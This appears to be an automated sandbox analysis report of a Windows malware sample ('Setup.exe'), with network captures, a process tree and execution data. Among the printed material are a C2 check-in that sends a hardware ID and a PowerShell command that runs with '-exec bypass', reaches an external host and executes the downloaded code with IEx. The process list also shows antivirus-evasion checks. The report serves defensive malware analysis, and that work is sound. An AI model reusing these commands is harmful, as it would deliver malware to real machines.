2025-01-10 22:28:47 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: sputnik-1985.com
2025-01-10 22:28:47 UTC	113	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=3951182BEDF2E27B7BAA2DF59C3D0BC7
2025-01-10 22:28:48 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ti58kmumpq8o8lkof8fenij052; expires=Tue, 06 May 2025 16:15:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BTA8n6AzPXO7vSwquNYaeJSRTR9F4oQGlDoR15UYvhiNlBX7un57LkNJXKIiE9Bs292ZTxsnqgx%2FrUmPE3UNcFQq3O%2Fip4Ee%2FBdlnx%2FhiUKKODUS2C2SsqiHRwtWtOAKdfA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90001a273c038cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1798&rtt_var=687&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1014&delivery_rate=1578378&cwnd=243&unsent_bytes=0&cid=cb390c1062c75732&ts=491&x=0"
2025-01-10 22:28:48 UTC	218	IN	Data Raw: 64 34 0d 0a 71 52 71 70 72 48 6d 78 52 70 51 72 6c 36 67 2f 74 66 47 55 33 55 47 31 39 44 6e 67 79 67 76 4d 75 73 67 37 48 45 4c 5a 76 6e 62 79 59 59 76 5a 57 34 74 6b 2f 46 2f 6a 32 45 79 50 72 62 75 42 62 74 61 52 58 70 58 6b 65 4b 54 56 75 47 63 7a 65 75 79 4a 51 70 73 73 6d 35 68 4e 68 78 71 37 57 2f 2b 47 53 38 32 46 74 76 46 6a 30 34 41 62 32 76 67 6e 37 74 2f 71 41 53 30 2f 39 63 56 55 33 44 69 54 6a 68 48 46 4d 75 52 59 72 66 51 51 36 64 37 2f 73 53 6a 46 6b 31 61 4f 76 32 50 69 79 61 42 55 62 42 37 32 31 78 6a 64 52 63 72 41 43 65 34 31 2f 45 71 35 33 45 66 42 30 37 6a 2f 4a 38 48 57 41 39 44 6d 4b 61 6d 59 38 67 74 68 48 77 3d 3d 0d 0a Data Ascii: d4qRqprHmxRpQrl6g/tfGU3UG19DngygvMusg7HELZvnbyYYvZW4tk/F/j2EyPrbuBbtaRXpXkeKTVuGczeuyJQpssm5hNhxq7W/+GS82FtvFj04Ab2vgn7t/qAS0/9cVU3DiTjhHFMuRYrfQQ6d7/sSjFk1aOv2PiyaBUbB721xjdRcrACe41/Eq53EfB07j/J8HWA9DmKamY8gthHw==
2025-01-10 22:28:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49991	185.161.251.21	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:49 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-10 22:28:49 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Fri, 10 Jan 2025 22:28:49 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-10 22:28:49 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49992	172.67.162.153	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:49 UTC	204	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipgonuh.shop
2025-01-10 22:28:50 UTC	802	IN	HTTP/1.1 403 Forbidden Date: Fri, 10 Jan 2025 22:28:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W4MyY3IwfhseXtGKV8TzkaEgFtXJRmrZmOxu8%2BaSnrg0sQY13vNschiAhRUe8z9tpHdPI%2Bpk1pOgDIXeIgBeEmy0XX6ZpfOA1D8gqh2SRwRXOaAlC1BiRNsbefurvIzNgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90001a34d94c7d0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1832&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=818&delivery_rate=1553191&cwnd=227&unsent_bytes=0&cid=29b883c1b24f4a73&ts=240&x=0"
2025-01-10 22:28:50 UTC	567	IN	Data Raw: 34 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 Data Ascii: 4197<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Forbidden</title>
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 65 78 3b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 23 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 6d 61 69 6e 20 3e 20 73 65 63 74 69 6f 6e 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 2e 32 Data Ascii: ex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.2
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 36 34 2e 30 32 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 37 36 2e 31 38 32 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 35 32 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 37 35 2e 39 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 30 5f 6c 69 6e 65 61 72 5f 35 33 5f 37 33 39 29 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 38 Data Ascii: " stroke-width="2" /> <rect x="64.026" y="76.1826" width="100.522" height="175.914" fill="url(#paint0_linear_53_739)" /> <rect x="8
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3d 22 35 2e 31 31 20 35 2e 31 31 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 2d 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 34 36 2e 37 39 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 2e 32 34 39 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 34 30 37 39 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 31 20 30 Data Ascii: stroke-linejoin="round" stroke-dasharray="5.11 5.11" /> <rect x="-1" y="1" width="146.798" height="21.2497" rx="2.40792" transform="matrix(-1 0
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 31 35 2e 31 36 32 20 31 36 37 2e 33 38 31 43 32 31 34 2e 37 31 37 20 31 36 38 2e 38 32 32 20 32 31 33 2e 31 38 39 20 31 36 39 2e 36 32 38 20 32 31 31 2e 37 34 39 20 31 36 39 2e 31 38 33 43 32 31 30 2e 33 30 38 20 31 36 38 2e 37 33 38 20 32 30 39 2e 35 30 32 20 31 36 37 2e 32 31 20 32 30 39 2e 39 34 37 20 31 36 35 2e 37 37 43 32 31 30 2e 33 39 32 20 31 36 34 2e 33 33 20 32 31 31 2e 39 32 20 31 36 33 2e 35 32 33 20 32 31 33 2e 33 36 20 31 36 33 2e 39 Data Ascii: stroke="#0055DC" stroke-width="2" /> <path d="M215.162 167.381C214.717 168.822 213.189 169.628 211.749 169.183C210.308 168.738 209.502 167.21 209.947 165.77C210.392 164.33 211.92 163.523 213.36 163.9
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 36 36 2e 31 38 32 20 37 39 2e 32 38 39 43 32 36 36 2e 38 32 39 20 38 32 2e 38 36 39 37 20 32 37 30 2e 32 35 36 20 38 35 2e 32 34 38 33 20 32 37 33 2e 38 33 36 20 38 34 2e 36 30 31 37 43 32 37 37 2e 34 31 37 20 38 33 2e 39 35 35 31 20 32 37 39 2e 37 39 36 20 38 30 2e 35 32 38 32 20 32 37 39 2e 31 34 39 20 37 36 2e 39 34 37 35 43 32 37 38 2e 35 30 33 20 37 33 2e 33 36 36 38 20 32 37 35 2e 30 37 36 20 37 30 2e 39 38 38 32 20 32 37 31 2e 34 39 35 20 37 31 2e 36 33 34 38 43 32 36 37 2e 39 31 34 20 37 32 2e 32 38 31 33 20 32 36 35 2e 35 33 36 20 37 35 2e 37 30 38 32 20 32 36 36 2e 31 38 32 20 37 39 2e 32 38 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 Data Ascii: d="M266.182 79.289C266.829 82.8697 270.256 85.2483 273.836 84.6017C277.417 83.9551 279.796 80.5282 279.149 76.9475C278.503 73.3668 275.076 70.9882 271.495 71.6348C267.914 72.2813 265.536 75.7082 266.182 79.289Z" fill="#6ECCE5"
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 37 39 2e 32 35 37 20 39 30 2e 32 32 33 31 43 32 37 31 2e 35 32 32 20 39 31 2e 36 31 39 39 20 32 36 34 2e 31 31 38 20 38 36 2e 34 38 31 34 20 32 36 32 2e 37 32 32 20 37 38 2e 37 34 36 43 32 36 31 2e 33 32 35 20 37 31 2e 30 31 30 36 20 32 36 36 2e 34 36 33 20 36 33 2e 36 30 37 35 20 32 37 34 2e 31 39 39 20 36 32 2e 32 31 30 38 43 32 38 31 2e 39 33 34 20 36 30 2e 38 31 34 20 32 38 39 2e 33 33 37 20 36 35 2e 39 35 32 34 20 32 39 30 2e 37 33 34 20 37 33 2e 36 38 37 38 43 32 39 32 2e 31 33 31 20 38 31 2e 34 32 33 32 20 32 38 36 2e 39 39 32 20 38 38 2e 38 32 36 33 20 32 37 39 2e 32 35 37 20 39 30 2e 32 32 33 31 5a 4d 32 36 30 2e 32 39 39 20 37 39 2e 31 38 33 35 43 32 36 31 2e 39 33 38 20 38 38 2e 32 35 36 37 20 32 37 Data Ascii: d="M279.257 90.2231C271.522 91.6199 264.118 86.4814 262.722 78.746C261.325 71.0106 266.463 63.6075 274.199 62.2108C281.934 60.814 289.337 65.9524 290.734 73.6878C292.131 81.4232 286.992 88.8263 279.257 90.2231ZM260.299 79.1835C261.938 88.2567 27
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 32 35 2e 34 34 33 38 4c 32 34 35 2e 37 35 34 20 32 36 2e 30 38 33 39 4c 32 34 34 2e 33 31 34 20 31 38 2e 31 30 37 34 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 33 36 2e 33 32 36 20 32 39 2e 36 31 36 36 4c 32 34 34 2e 33 30 32 20 32 38 2e 31 37 36 33 4c 32 34 34 2e 39 34 33 20 33 31 2e 37 32 31 34 4c 32 33 36 2e 39 36 36 20 33 33 2e 31 36 31 37 4c 32 33 36 2e 33 32 36 20 32 39 2e 36 31 36 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 Data Ascii: 25.4438L245.754 26.0839L244.314 18.1074Z" fill="#0055DC" /> <path d="M236.326 29.6166L244.302 28.1763L244.943 31.7214L236.966 33.1617L236.326 29.6166Z" fill="#0055DC" /> <path
2025-01-10 22:28:50 UTC	1369	IN	Data Raw: 38 20 33 31 33 2e 39 36 32 20 31 36 31 2e 38 36 39 20 33 31 33 2e 34 36 31 20 31 38 30 2e 33 31 36 43 33 31 32 2e 39 35 36 20 31 39 38 2e 38 39 36 20 33 30 37 2e 30 35 31 20 32 31 37 2e 38 34 35 20 32 39 38 2e 33 39 36 20 32 33 31 2e 39 32 39 43 32 38 39 2e 35 30 39 20 32 34 36 2e 33 39 31 20 32 37 38 2e 39 33 35 20 32 35 33 2e 39 35 36 20 32 36 39 2e 37 34 20 32 35 33 2e 37 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 8 313.962 161.869 313.461 180.316C312.956 198.896 307.051 217.845 298.396 231.929C289.509 246.391 278.935 253.956 269.74 253.706Z" fill="white" stroke="#C5EBF5" stroke-width="12" /> <path

Target ID:	0
Start time:	17:27:18
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	73'412'279 bytes
MD5 hash:	380CEF4CFA43FA74716059E3296850EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:27:20
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:27:20
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:27:21
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x660000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:27:21
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x220000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:27:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x660000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:27:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x220000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:27:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 302164
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:27:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Hentai
Imagebase:	0x3f0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:27:23
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "ENOUGH" Golf
Imagebase:	0x220000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:27:23
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 302164\Vulnerability.com + Tape + Naval + Offered + Rhode + Wiring + Tapes + Loc + Treasures + Determining + Tiny + Affects + Computing 302164\Vulnerability.com
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:27:23
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Achieved + ..\Indians + ..\Por + ..\Argentina + ..\Documentation + ..\Usda + ..\Standard + ..\Cdt v
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:27:23
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com
Wow64 process (32bit):	true
Commandline:	Vulnerability.com v
Imagebase:	0x740000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:27:23
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xee0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:28:48
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0xfe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:28:48
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	34

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
